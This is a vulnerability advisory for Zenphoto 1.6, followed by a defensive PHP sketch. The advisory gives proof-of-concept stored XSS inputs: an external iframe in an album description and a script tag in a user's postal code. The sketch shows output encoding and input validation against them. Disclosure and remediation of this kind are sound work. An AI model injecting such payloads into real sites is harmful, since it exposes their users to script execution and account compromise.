Zenphoto 1.6 Cross Site Scripting

Zenphoto version 1.6 suffers from multiple persistent cross site scripting vulnerabilities.

Packet Storm
Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version: 1.6
Bugs: XSS
Technology: PHP
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
###XSS-1###
steps:
1. create new album
2. write Album Description : <iframe src="https://14.rs"></iframe>
3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/
=====================================================
###XSS-2###
steps:
1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
2. change postal code as <script>alert(4)</script>
3. if admin user information import as html , xss will trigger
poc video : https://youtu.be/JKdC980ZbLY
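A defensive sketch of the output encoding and input validation that would neutralise both PoC inputs above, covering the album page sink (XSS-1) and the HTML rendering of user information (XSS-2). This is an added example, not Zenphoto's code or its actual fix; the helper names (`h`, `valid_postal_code`, `user_row_html`), the field names and the postal-code pattern are assumptions, and it assumes the album description is meant to display as plain text (a description that must keep formatting needs an allowlist HTML sanitizer instead).

```php
<?php
// Added example: hypothetical helpers, not Zenphoto's own code.

/** Encode a stored value for an HTML text or quoted-attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Input check: accept only characters real postal codes use (assumed pattern). */
function valid_postal_code(string $code): bool
{
    return preg_match('/^[A-Za-z0-9][A-Za-z0-9 \-]{1,11}$/', $code) === 1;
}

/** Build one table row of user information with every field encoded. */
function user_row_html(array $user): string
{
    $cells = '';
    foreach (['user', 'name', 'postal'] as $field) { // assumed field names
        $cells .= '<td>' . h((string) ($user[$field] ?? '')) . '</td>';
    }
    return '<tr>' . $cells . '</tr>';
}

// Constructed sample values that mirror the two PoC inputs.
$albumDescription = '<iframe src="https://14.rs"></iframe>';
$user = [
    'user'   => 'editor1',
    'name'   => 'Test User',
    'postal' => '<script>alert(4)</script>',
];

// XSS-1 sink: the album page prints the description as text, not markup.
echo '<div class="album-desc">' . h($albumDescription) . "</div>\n";

// XSS-2 input check: the script payload is refused, a plain code is accepted.
var_dump(valid_postal_code($user['postal']));
var_dump(valid_postal_code('AZ 1000'));

// XSS-2 sink: a bad value that is already stored is still encoded on output.
echo user_row_html($user) . "\n";
```

Encoding at the sink is the control that matters here; the input check only reduces what reaches storage and does not replace it.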
